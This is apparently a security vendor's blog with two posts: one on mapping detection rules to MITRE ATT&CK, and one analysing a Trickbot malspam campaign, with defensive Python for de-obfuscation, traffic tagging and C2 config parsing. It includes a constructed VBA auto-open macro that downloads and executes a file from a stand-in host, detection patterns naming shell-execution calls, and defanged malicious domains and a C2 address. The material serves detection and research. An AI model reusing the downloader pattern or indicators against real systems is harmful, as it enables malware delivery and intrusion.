RSA NetWitness Platform Blog, posts by Prakhar Pandey

Introduction to MITRE’s ATT&CK™


Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) for Enterprise is a framework that describes adversary behavior as a sequence of tactics, from Initial Access (exploit) through Command & Control (maintain). ATT&CK™ Enterprise classifies adversarial tactics and techniques, primarily post-compromise, against Windows™, Linux™ and macOS™.


In addition, MITRE maintains two related frameworks, PRE-ATT&CK™ and the ATT&CK™ Mobile Profile. PRE-ATT&CK™ categorizes pre-compromise tactics, techniques and procedures (TTPs) independently of platform or OS: the adversary's planning, information gathering, reconnaissance and infrastructure setup before the victim is compromised.


The ATT&CK™ Mobile Profile is specific to Android and iOS environments and has three matrices that classify tactics and techniques. It covers not only post-compromise tactics and techniques but also pre-compromise TTPs in mobile environments.


This community-enriched model adds the techniques used to realize each tactic. The technique list is not exhaustive; the community adds techniques as they are observed and verified.


This matrix is helpful for validating defenses already in place and for designing new security measures. It can be used in the following ways to improve and validate defenses:


  1. The framework can be used to create adversary emulation plans, which hunters and defenders can use to test and verify their defenses. Because the framework evolves with observed adversary behavior, these plans also keep your testing aligned with an industry standard that is continually updated.
  2. Adversary behavior can be mapped onto the ATT&CK™ matrix and used for analytics to improve your Indicators of Compromise (IOCs) or Behaviors of Compromise (BOCs). This enhances detection with greater insight into threat-actor-specific information.
  3. Mapping your existing defenses onto the matrix gives a visualization of which tactics and techniques are detected, which exposes gaps and lets you prioritize the effort to build new defenses.
  4. The ATT&CK™ framework helps build threat intelligence from the perspective of not just TTPs but also the threat groups and software that use them. Detection then depends not only on a TTP but on its relationship with the groups and software in play.


Figure 1: Relationships between Threat-Group, Software, Tactics and Techniques


This framework resolves the following problems:


  1. Existing Kill Chain concepts were too abstract to relate new techniques to new types of detection capabilities and defenses. ATT&CK can be thought of as a Kill Chain on steroids.
  2. Techniques added or considered must have been observed in a real environment, not just derived from theoretical concepts. Community curation ensures that the techniques have been seen in the wild and are therefore suitable for people using this model in real environments.
  3. The model gives a common language and terminology across different environments and threat actors, which is important in making it an industry standard.
  4. Granular indicators like domain names, hashes and protocols do not provide enough information to see the bigger picture of how the threat actor is exploiting the system, or its relationship with the various sub-systems and tools the adversary uses. This model gives a good understanding of the relationship between tactics and techniques, which can then be used to drill down into only the important granular details.
  5. The model provides a common repository whose content can be consumed through APIs and programs. It is available via a public TAXII 2.0 server that serves STIX 2.0 content.
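As an added illustration (not code from the original post or from MITRE), the following Python walks a STIX 2.0 bundle of the kind the ATT&CK TAXII server serves and reconstructs the Figure 1 relationships: which techniques a group uses directly, which it reaches through the software it uses, and which tactic each technique belongs to. The bundle embedded below is a constructed miniature (the group and software are made up; the technique IDs and tactic names are real ATT&CK Enterprise values), so it runs offline; the same functions work unchanged on a full bundle saved from the TAXII server.

```python
import json
from collections import defaultdict

# Constructed miniature STIX 2.0 bundle. Only the fields used below are present.
# "Constructed Group" and "ConstructedRAT" are made up; T1086 (PowerShell), T1003
# (Credential Dumping) and T1053 (Scheduled Task) are real ATT&CK technique IDs.
SAMPLE_BUNDLE = json.dumps({
    "type": "bundle", "spec_version": "2.0",
    "id": "bundle--00000000-0000-0000-0000-000000000000",
    "objects": [
        {"type": "intrusion-set", "id": "intrusion-set--1", "name": "Constructed Group",
         "external_references": [{"source_name": "mitre-attack", "external_id": "G0000"}]},
        {"type": "malware", "id": "malware--1", "name": "ConstructedRAT"},
        {"type": "attack-pattern", "id": "attack-pattern--1", "name": "PowerShell",
         "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}],
         "external_references": [{"source_name": "mitre-attack", "external_id": "T1086"}]},
        {"type": "attack-pattern", "id": "attack-pattern--2", "name": "Credential Dumping",
         "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}],
         "external_references": [{"source_name": "mitre-attack", "external_id": "T1003"}]},
        {"type": "attack-pattern", "id": "attack-pattern--3", "name": "Scheduled Task",
         "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"},
                               {"kill_chain_name": "mitre-attack", "phase_name": "persistence"},
                               {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}],
         "external_references": [{"source_name": "mitre-attack", "external_id": "T1053"}]},
        # "uses" edges: group -> software, software -> technique, group -> technique
        {"type": "relationship", "id": "relationship--1", "relationship_type": "uses",
         "source_ref": "intrusion-set--1", "target_ref": "malware--1"},
        {"type": "relationship", "id": "relationship--2", "relationship_type": "uses",
         "source_ref": "malware--1", "target_ref": "attack-pattern--1"},
        {"type": "relationship", "id": "relationship--3", "relationship_type": "uses",
         "source_ref": "malware--1", "target_ref": "attack-pattern--3"},
        {"type": "relationship", "id": "relationship--4", "relationship_type": "uses",
         "source_ref": "intrusion-set--1", "target_ref": "attack-pattern--2"},
        # A non-"uses" edge that the walk below must ignore.
        {"type": "relationship", "id": "relationship--5", "relationship_type": "mitigates",
         "source_ref": "course-of-action--1", "target_ref": "attack-pattern--2"},
    ],
})


def load_bundle(text):
    return json.loads(text)


def attack_id(obj):
    """ATT&CK ID (T1086, G0016, S0002 ...) from a STIX object's external_references, or None."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id")
    return None


def index_bundle(bundle):
    """Split a bundle into an id -> object map and a 'uses' adjacency map."""
    objects = {o["id"]: o for o in bundle["objects"] if o["type"] != "relationship"}
    uses = defaultdict(set)
    for o in bundle["objects"]:
        if o["type"] == "relationship" and o.get("relationship_type") == "uses":
            uses[o["source_ref"]].add(o["target_ref"])
    return objects, uses


def technique_tactics(bundle):
    """Map technique ID -> sorted list of tactic names (mitre-attack kill-chain phases)."""
    objects, _ = index_bundle(bundle)
    result = {}
    for o in objects.values():
        if o["type"] == "attack-pattern":
            phases = [p["phase_name"] for p in o.get("kill_chain_phases", [])
                      if p.get("kill_chain_name") == "mitre-attack"]
            result[attack_id(o)] = sorted(phases)
    return result


def group_techniques(bundle):
    """Map group name -> {technique ID -> set of paths}. A path is "direct" when the
    group uses the technique itself, or the software name when the technique is
    reached through malware/tools the group uses."""
    objects, uses = index_bundle(bundle)
    result = {}
    for gid, group in objects.items():
        if group["type"] != "intrusion-set":
            continue
        techniques = defaultdict(set)
        for target_id in uses[gid]:
            target = objects.get(target_id)
            if target is None:          # dangling reference: skip rather than crash
                continue
            if target["type"] == "attack-pattern":
                techniques[attack_id(target)].add("direct")
            elif target["type"] in ("malware", "tool"):
                for tech_id in uses[target_id]:
                    tech = objects.get(tech_id)
                    if tech is not None and tech["type"] == "attack-pattern":
                        techniques[attack_id(tech)].add(target["name"])
        result[group["name"]] = dict(techniques)
    return result


if __name__ == "__main__":
    bundle = load_bundle(SAMPLE_BUNDLE)
    tactics = technique_tactics(bundle)
    for group, techs in group_techniques(bundle).items():
        for tid in sorted(techs):
            print(group, tid, "/".join(tactics[tid]), "via", ", ".join(sorted(techs[tid])))
```

The walk deliberately stops one hop past software: a group → software → technique chain is the only indirect relationship the framework defines, so deeper traversal would only invent links the data does not contain.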


ATT&CK Navigator


ATT&CK Navigator is a tool openly available on GitHub that uses the STIX 2.0 content to provide a layered visualization of the ATT&CK model.


Figure 2: ATT&CK Navigator


By default it uses MITRE's TAXII server, but it can be pointed at any TAXII server of choice. Navigator represents layers as JSON files, so layers can be generated programmatically and then imported.


RSA NetWitness Event Stream Analysis (ESA)


ESA is one of the defense systems used to generate alerts. ESA Rules provide real-time, complex event processing of log, packet, and endpoint meta across sessions. ESA Rules can identify threats and risks by recognizing adversarial Tactics, Techniques and Procedures (TTPs).


The following are ESA Components:


  1. Alert - Output from a rule that matches data in the environment.
  2. Template - Convert the rule syntax into code (Esper) that ESA understands.
  3. Constituent Events - All of the events involved in an alert, including the trigger event.
  4. Rule Library - A list of all the ESA Rules that have been created.
  5. Deployments - A list of the ESA Rules that have been deployed to an ESA device.


The Rule Library contains all the ESA Rules, and we can map these rules, i.e. our detection capabilities, to the tactics and techniques of the ATT&CK matrix. The mapping shows how many tactics and techniques ESA detects. The Excel workbook with the mapping between ESA Rules and ATT&CK Tactics/Techniques is attached to this blog post.


In other words, the overlap between ESA Rules and the ATT&CK matrix not only shows how far our detection capabilities reach across the matrix but also quantifies the evolution of the product: we can measure how much we are improving and in which directions.


We created a layer as a JSON file with all the ESA Rules mapped to techniques, then imported that layer into the ATT&CK Navigator matrix to show the overlap. In the following image, every technique detected by an ESA Rule is highlighted:


Figure 3: ATT&CK Navigator Mapping to ESA Rules


To quantify how far ESA Rules spread across the matrix, we can refer to the following plot:


Figure 4: Plot for ATT&CK Matrix Mapping to ESA Rules
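The layer file and the per-tactic counts behind a plot like Figure 4 can both be produced from the same rule-to-technique table. The Python below is an added example, not the script or workbook behind this post: it takes a constructed stand-in for the mapping (rule names are made up; technique IDs and tactic names are real ATT&CK Enterprise values), emits a Navigator layer in which each cell's score is the number of rules covering it, and counts distinct covered techniques per tactic in matrix order. The layer-format version string is assumed for the Navigator build of the time; check it against the Navigator release you import into.

```python
import json
from collections import defaultdict

# Tactic order of the ATT&CK Enterprise matrix as it stood when this post was written.
ENTERPRISE_TACTICS = [
    "initial-access", "execution", "persistence", "privilege-escalation",
    "defense-evasion", "credential-access", "discovery", "lateral-movement",
    "collection", "exfiltration", "command-and-control",
]

# Constructed stand-in for the attached workbook. Rule names are made up; one rule may
# map to several (technique, tactic) cells, and several rules may map to the same cell.
RULE_MAPPING = [
    {"rule": "Example Rule: Encoded PowerShell", "technique": "T1086", "tactic": "execution"},
    {"rule": "Example Rule: LSASS Memory Read", "technique": "T1003", "tactic": "credential-access"},
    {"rule": "Example Rule: Mimikatz Strings", "technique": "T1003", "tactic": "credential-access"},
    {"rule": "Example Rule: New Scheduled Task", "technique": "T1053", "tactic": "persistence"},
    {"rule": "Example Rule: New Scheduled Task", "technique": "T1053", "tactic": "privilege-escalation"},
]


def build_layer(mapping, name, description=""):
    """Aggregate rule -> technique rows into one Navigator layer dict.
    One entry per (technique, tactic) cell; score = number of rules covering the cell,
    so the gradient shows depth of coverage; comment = the rule names."""
    cells = defaultdict(list)
    for row in mapping:
        cells[(row["technique"], row["tactic"])].append(row["rule"])
    techniques = [
        {"techniqueID": tech, "tactic": tactic, "score": len(rules),
         "comment": "; ".join(sorted(set(rules)))}
        for (tech, tactic), rules in sorted(cells.items())
    ]
    max_score = max((t["score"] for t in techniques), default=1)
    return {
        "name": name,
        "version": "2.1",              # assumed layer-format version for the Navigator of the time
        "domain": "mitre-enterprise",
        "description": description,
        "techniques": techniques,
        "gradient": {"colors": ["#ffffff", "#ff6666"], "minValue": 0, "maxValue": max_score},
    }


def coverage_by_tactic(mapping):
    """Distinct techniques with at least one rule, per tactic, in matrix order."""
    seen = defaultdict(set)
    for row in mapping:
        seen[row["tactic"]].add(row["technique"])
    return {tactic: len(seen[tactic]) for tactic in ENTERPRISE_TACTICS}


def layer_json(mapping, name):
    """Serialized layer, ready to be imported into Navigator."""
    return json.dumps(build_layer(mapping, name), indent=2)


if __name__ == "__main__":
    print(layer_json(RULE_MAPPING, "ESA Rules (constructed sample)"))
    for tactic, count in coverage_by_tactic(RULE_MAPPING).items():
        print(f"{tactic:22s} {count}")
```

Counting distinct techniques per tactic, rather than rules, keeps the plot honest: three rules for one technique widen depth, not breadth. Re-running this on each release's mapping and diffing the counts is the "evolution of the product" measurement described above.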


Moving forward, we can map our other detection capabilities onto the ATT&CK matrix. This will give a consolidated picture of our complete defense system, so that we can quantify and monitor the evolution of our detection capabilities.










Thanks to Michael Sconzo and Raymond Carney for their valuable suggestions.

In the first week of August 2017, malspam activity was observed delivering the Trickbot banking trojan, which has been heavily active this summer and has now evolved once again.


Trickbot emerged in 2016 targeting banks in countries like the UK and India, but it has since expanded its range of countries and victims to include PayPal and Customer Relationship Management (CRM) providers. Trickbot has also consistently evolved, recently adding new evasion techniques, browser manipulation tools, modules targeting Microsoft Outlook data, and now worm functionality.


Primary delivery of the malware has been attributed to the Necurs botnet and occasionally to the RIG exploit kit. In this most recent campaign, malspam delivered an MS Word document (file name: SecureMessage.doc) containing embedded, obfuscated VBA macros alongside a Santander bank decoy.



The document contains malicious VBA code, and What's This File gives it the maximum threat score. The VBA code analysis shows the main indicators as “VBA Code Contains Reference to Code Execution” and “VBA Code Contains Auto-Launch Scripts”.




As visible below, the cleaned-up VBA code contained in the document uses Shell to launch an executable.




The use of Chr in the VBA code suggests that specific strings are obfuscated:
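The Chr() concatenation pattern is mechanical enough to undo automatically before reading a macro. The Python below is an added example, not the document's macro or any RSA tool: it rewrites every chain of Chr()/ChrW()/Chr$() calls and short literals joined with & into one plain string literal, lists the strings that were hidden behind at least one Chr(), and then looks for the two indicator classes named above (auto-launch entry points and code execution) plus a download URL in the decoded source. The macro it runs on is a constructed fragment in the same style as the one described, not the real SecureMessage.doc code.

```python
import re

# Constructed VBA fragment in the style of the macro described above (not the real one):
# the URL and part of the drop path are assembled from Chr() calls and short literals.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim url As String, dst As String
    url = Chr(104) & Chr(116) & Chr(116) & Chr(112) & "://example.invalid/" & Chr(110) & "ologo.png"
    dst = Environ("TEMP") & "\" & Chr(121) & "wbltmn.exe"
    Download url, dst   ' downloader sub omitted from this constructed sample
    Shell dst, vbHide
End Sub
'''

# One piece: Chr(n) / ChrW(n) / Chr$(n) with a numeric literal, or a VBA string literal
# (quotes inside literals are doubled, so "" is part of the string, not its end).
PIECE = r'(?:Chr[W$]?\(\s*\d+\s*\)|"(?:[^"\n]|"")*")'
CHAIN = re.compile(PIECE + r'(?:\s*&\s*' + PIECE + r')*', re.IGNORECASE)
TOKEN = re.compile(r'Chr[W$]?\(\s*(\d+)\s*\)|"((?:[^"\n]|"")*)"', re.IGNORECASE)

# Indicator classes checked on the DECODED source; the first two mirror the analysis
# verdicts quoted above, the third is this example's own addition.
INDICATORS = {
    "auto-launch": re.compile(r'\b(AutoOpen|Document_Open|AutoExec|Workbook_Open)\b', re.IGNORECASE),
    "code-execution": re.compile(r'\b(Shell|WScript\.Shell|CreateObject|CallByName)\b', re.IGNORECASE),
    "download": re.compile(r'https?://|URLDownloadToFile|XMLHTTP', re.IGNORECASE),
}


def _decode(chain_text):
    """Evaluate one concatenation chain to the string it builds.
    Chr() in VBA is code-page based; Python's chr() agrees with it for the ASCII range,
    which is all that string obfuscation of this kind normally uses."""
    parts = []
    for tok in TOKEN.finditer(chain_text):
        if tok.group(1) is not None:
            parts.append(chr(int(tok.group(1))))
        else:
            parts.append(tok.group(2).replace('""', '"'))
    return "".join(parts)


def _quote(s):
    return '"' + s.replace('"', '""') + '"'


def deobfuscate(source):
    """Rewrite every Chr()/literal chain in the source as one plain VBA string literal."""
    return CHAIN.sub(lambda m: _quote(_decode(m.group(0))), source)


def decoded_strings(source):
    """Strings that were hidden behind at least one Chr() call, in source order."""
    return [_decode(m.group(0)) for m in CHAIN.finditer(source)
            if re.search(r'Chr[W$]?\(', m.group(0), re.IGNORECASE)]


def indicators(source):
    """Indicator classes that match after de-obfuscation."""
    clean = deobfuscate(source)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(clean))


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_VBA))
    print(decoded_strings(SAMPLE_VBA))
    print(indicators(SAMPLE_VBA))
```

Running the indicator checks on the decoded source matters: in the sample the literal text http:// never appears in the raw macro, so a download indicator keyed on the raw file would miss it. Chains that mix in variables (Environ("TEMP") above) decode only as far as the literal parts reach, which is the expected result rather than an error.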



Upon opening, the attachment attempts to download a PNG file (file name: nologo.png) that is actually an executable, the Trickbot payload. The first attempt to download the PNG from lexpertpret[.]com failed, but a second attempt to hvsglobal[.]co[.]uk succeeded, and the file was saved as 'C:\Users\student\AppData\Local\Temp\ywbltmn.exe'.



NetWitness provides visibility into this activity and characterizes it as malicious through some of the more obvious meta tags, such as session.analysis = “first carve not dns”, service.analysis = “http no referer”, and file.analysis = “exe filetype but not exe extension”.
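Two of those tags come straight from comparing what the session claims with what it carries. The Python below is an added example, not NetWitness parser code: it takes a constructed HTTP request/response pair shaped like the download above (a .png URL, an image/png Content-Type, and a body that begins with the MZ header of a Windows executable), sniffs the body by magic bytes, and emits "http no referer" and "exe filetype but not exe extension" on the same evidence the meta keys describe, plus a "content-type mismatch" tag of its own. "first carve not dns" depends on session ordering and is not modeled. The host name is the reserved example.invalid.

```python
# Constructed HTTP request and response. The body is a fake PE header (MZ plus padding),
# not a real executable.
SAMPLE_REQUEST = (
    b"GET /nologo.png HTTP/1.1\r\n"
    b"Host: example.invalid\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)\r\n"
    b"Connection: close\r\n\r\n"
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: image/png\r\n"
    b"Content-Length: 64\r\n\r\n"
    + b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00" + b"\x00" * 48
)

# Magic-byte prefixes for the few file types this example recognizes.
MAGIC = [(b"MZ", "exe"), (b"\x89PNG\r\n\x1a\n", "png"), (b"%PDF", "pdf"), (b"PK\x03\x04", "zip")]

# Content-Type values under which each sniffed type is NOT a mismatch.
EXPECTED_CTYPE = {
    "exe": {"application/x-msdownload", "application/x-dosexec", "application/octet-stream"},
    "png": {"image/png"},
    "pdf": {"application/pdf"},
    "zip": {"application/zip", "application/x-zip-compressed"},
}


def parse_http(raw):
    """Split a raw HTTP message into (start line, lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def sniff(body):
    """File type by magic bytes, ignoring whatever the name or headers claim."""
    for prefix, kind in MAGIC:
        if body.startswith(prefix):
            return kind
    return "unknown"


def url_extension(request_line):
    """Lower-cased extension of the requested path, or "" if the last segment has none."""
    path = request_line.split(" ")[1].split("?")[0]
    last = path.rsplit("/", 1)[-1]
    return last.rsplit(".", 1)[1].lower() if "." in last else ""


def analyze(request, response):
    """Analysis tags for one HTTP session. The first two names echo the meta values
    quoted above; "content-type mismatch" is this example's own addition."""
    req_line, req_headers, _ = parse_http(request)
    _, res_headers, body = parse_http(response)
    tags = []
    if "referer" not in req_headers:
        tags.append("http no referer")
    kind = sniff(body)
    if kind == "exe" and url_extension(req_line) != "exe":
        tags.append("exe filetype but not exe extension")
    ctype = res_headers.get("content-type", "").split(";")[0].strip().lower()
    if kind in EXPECTED_CTYPE and ctype and ctype not in EXPECTED_CTYPE[kind]:
        tags.append("content-type mismatch")
    return tags


if __name__ == "__main__":
    print(analyze(SAMPLE_REQUEST, SAMPLE_RESPONSE))
```

"http no referer" on its own is weak (typed URLs and many clients omit it); its value is in the stack with the file-type mismatch, which is why the post lists the tags together rather than alerting on any one of them.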




NetWitness Endpoint (aka ECAT) also easily detects this shady behavior. For more details, please refer to FirstWatch's July 2017 work against Trickbot.


The malware's configuration file carries Command and Control (C2) information as well as other module-related settings. In this case the version is 1000030, the group tag is ser801, and systeminfo and injectDll are the two modules the executable will attempt to download from any of the listed C2 servers.
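Once the configuration has been decrypted, extracting the C2 list and module names is a small parsing job. The Python below is an added example, not code from this post: it parses a constructed configuration in the <mcconf> XML layout that public Trickbot analyses describe (treated here as an assumption about the format; the real sample's config is not reproduced), using the version, group tag and module names given above and RFC 5737 documentation addresses in place of real C2 IPs. It also defangs addresses for reporting and turns the C2 list into CSV rows of the kind one would load into a feed.

```python
import xml.etree.ElementTree as ET

# Constructed decrypted configuration. Version, gtag and module names are the ones
# named in the post; the C2 addresses are documentation-only addresses (RFC 5737).
SAMPLE_CONFIG = """<mcconf>
  <ver>1000030</ver>
  <gtag>ser801</gtag>
  <servs>
    <srv>192.0.2.10:443</srv>
    <srv>198.51.100.7:449</srv>
    <srv>203.0.113.25:443</srv>
  </servs>
  <autorun>
    <module name="systeminfo" ctl="GetSystemInfo"/>
    <module name="injectDll"/>
  </autorun>
</mcconf>"""


def parse_config(xml_text):
    """Pull version, group tag, C2 list and autorun modules out of an <mcconf> document.
    The input is attacker-controlled; ElementTree does not fetch external entities, but
    use defusedxml if you need stronger guarantees against hostile XML."""
    root = ET.fromstring(xml_text)
    if root.tag != "mcconf":
        raise ValueError("not an mcconf document: root is <%s>" % root.tag)
    return {
        "version": (root.findtext("ver") or "").strip(),
        "gtag": (root.findtext("gtag") or "").strip(),
        "c2": [(s.text or "").strip() for s in root.iter("srv") if (s.text or "").strip()],
        "modules": [m.get("name") for m in root.iter("module") if m.get("name")],
    }


def defang(address):
    """192.0.2.10:443 -> 192[.]0[.]2[.]10:443, so the address cannot be clicked or auto-linked."""
    host, _, port = address.partition(":")
    return host.replace(".", "[.]") + (":" + port if port else "")


def feed_rows(config):
    """CSV rows ip,port,version,gtag for the C2 servers; the version and group tag ride
    along so an alert can say which build/campaign an IP belongs to."""
    rows = []
    for address in config["c2"]:
        host, _, port = address.partition(":")
        rows.append("%s,%s,%s,%s" % (host, port, config["version"], config["gtag"]))
    return rows


if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CONFIG)
    print("version", cfg["version"], "gtag", cfg["gtag"], "modules", cfg["modules"])
    for address in cfg["c2"]:
        print(defang(address))
    print("\n".join(feed_rows(cfg)))
```

Keeping the group tag next to each IP in the feed is what lets the later correlation in this post (which campaign, which module set) survive once the raw sample is gone.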



Most of these C2 IPs are known to be associated with devices like routers and IP cameras [3]. For example, 84[.]238[.]198[.]166 from our config file appears to be a router.



Version 1000029 of Trickbot, which preceded this sample, debuted worm-like capabilities to spread infections via the EternalBlue exploit for CVE-2017-0144 in the Server Message Block (SMB) protocol. To do so, the malware enumerates servers using the NetServerEnum Windows API and then queries LDAP to identify computers that are not domain controllers [1]. These capabilities are believed to be in a testing phase and not yet fully implemented.




With regard to evasion, this new Trickbot codebase also demonstrates new capabilities [4]. Recent Trickbot versions contain blacklist checks for a variety of defense- and research-oriented DLLs, processes, file names, user names and window names, and also check whether a debugger is present. On any positive hit, Trickbot exits and uninstalls itself.






Version 1000030 is also known to have two extra modules compared to previous versions of Trickbot [2]:

1. module.dll – written in C++, steals information from browsers

2. outlook.dll – written in Delphi, steals Microsoft Outlook data

The presence of Delphi can be inferred by analyzing the dropped EXE file through Hybrid Analysis:



Post infection, Trickbot uses both “Static Injection” (replacing real bank login pages with rogue ones) and “Dynamic Injection” (redirecting browsers to C2) to steal victim credentials. Below is an example of a legitimate page (left) and a rogue page (right), where a Chrome icon indicates that some elements of the page are not from secure sources [5]:



The Trickbot banking trojan and the group responsible need to be studied periodically, because this successor of Dyre has proven to be capable and ever evolving. All relevant IOCs have been added to the FirstWatch C2 Domains and IPs feeds available in RSA Live.


Thanks to Kevin Stear and Erik Heuser for their contribution.














